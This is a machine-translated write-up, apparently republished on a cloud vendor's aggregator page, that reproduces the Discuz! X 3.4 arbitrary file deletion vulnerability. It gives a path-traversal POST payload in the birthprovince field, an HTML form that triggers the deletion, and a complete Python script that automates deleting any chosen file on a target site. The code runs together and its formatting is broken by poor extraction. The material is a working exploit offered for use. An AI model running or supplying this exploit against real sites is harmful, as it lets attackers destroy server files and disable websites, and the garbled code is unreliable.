discuz! X 3.4 Any file deletion vulnerability recurrence process (Python script included)

Source: Internet
Author: User
Tags set cookie python script

Today, we're talking about discuz! in the group. X 3.4 Any file deletion vulnerability, self-made some tests, record the process. At the end, attach your own Python script and automate any file deletion.

Specific vulnerability, please view https://paper.seebug.org/411/

0X01 Environment Construction

To the official website download Discuz 3.4 version, phpstudy this machine builds, and registers the account. The site root creates a new 111.txt as the deleted destination file.

Discuz 3.4 Download Link: http://www.discuz.net/thread-3825961-1-1.html

0X02 Environment Construction

1, after the account login, click Settings, jump to the profile page, view the page source code, get Formhash value

2. Submit a request to amend the place of birth

Http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base

[post] birthprovince=. /.. /.. /111.txt&profilesubmit=1&formhash=9945c60c

3. Construct the form, delete the file after the request

<form action="Http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthproviNce]=aaaaaa"method="POST"enctype="Multipart/form-data"><input type="file"Name="birthprovince"Id="file"/><input type="text"Name="Formhash"Value="9945c60c"/></p><input type="text"Name="Profilesubmit"Value="1"/></p><input type="Submit"Value="Submit"/></ from>

0X03 python Script

According to the previous steps, wrote a Python script, instead of manual operation, the native test success ... Long time no script, code a little low, enough can ...

#!/usr/bin/Env python#-*-coding:utf-8-*-import requestsimport reimport urllib2" "discuz! X≤3.4arbitrary file Removal Vulnerability write by Aaron" "def get_cookie (): Cookies={}     forLineinchRaw_cookies.split (';'): Key,value=line.split ('=',1) Cookies[key]=valuereturncookiesdef get_formhash (URL): Cookies=Get_cookie () Testurl=url+"/HOME.PHP?MOD=SPACECP"s=requests.Get(testurl,cookies=cookies) COM= Re.compile ('<input type= "hidden" name= "Formhash" value= "(. *?)"/>') Result=Com.findall (S.text)returnresult[0]def Del_step1 (url,filename): Headers={'user-agent':'mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) gecko/20100101 firefox/55.0'} Geturl=url+"/home.php?mod=spacecp&ac=profile&op=base"Formhash=get_formhash (URL) payload={'birthprovince': filename,"Profilesubmit":1,"Formhash": Formhash} cookies=Get_cookie () R= Requests.post (geturl,data=payload,headers=headers,cookies=cookies)ifR.content.find ('parent.show_success') >0: Print'STEP1 Success!!!'def del_step2 (URL): Geturl=url+"/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"Heads={'user-agent':'mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) gecko/20100101 firefox/55.0'} Formhash=get_formhash (URL) files={'Formhash':(None,formhash),'birthprovince':('1.jpg', Open ('1.jpg','RB'),'Image/jpeg'),'Profilesubmit':(None,'1')} Cookies=Get_cookie () R=requests.post (geturl,files=files,headers=heads,cookies=cookies)ifR.text.find ('parent.show_success') >0: Print'STEP2 Success!!!'        if__name__ = ='__main__': #需要修改以下三个参数: #1, set cookie raw_cookies="G2pl_2132_sid=skkqzk; G2pl_2132_saltkey=sz3zk9qk; g2pl_2132_lastvisit=1506772875; G2PL_2132_LASTACT=1506779386%09HOME.PHP%09SPACECP; G2PL_2132_SECCODE=7.AA0407E77FA5C31C1B; G2pl_2132__refer=%252fhome.php%253fmod%253dspacecp%2526ac%253dprofile%2526op%253dbase; g2pl_2132_ulastactivity=d085jjijs5hig3obxlejquw0znypin60oxjv0j6di%2b8afmkq4u6l; G2PL_2132_AUTH=86C5F09HGUAZUGNPSX7PR7OY4MQ2B39NSVIV%2FRFC8VDN1ZJB9PIBVU2FN4JJR9HR7YVNF2VH9RIXRSLWHMZK; g2pl_2132_nofavfid=1; g2pl_2132_sendmail=1; G2pl_2132_noticetitle=1"    #2, set the deleted file filename=".. /.. /.. /111.txt"      #3, set URL URL="http://127.0.0.1"del_step1 (url,filename) del_step2 (URL)

discuz! X 3.4 Any file deletion vulnerability recurrence process (Python script included)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.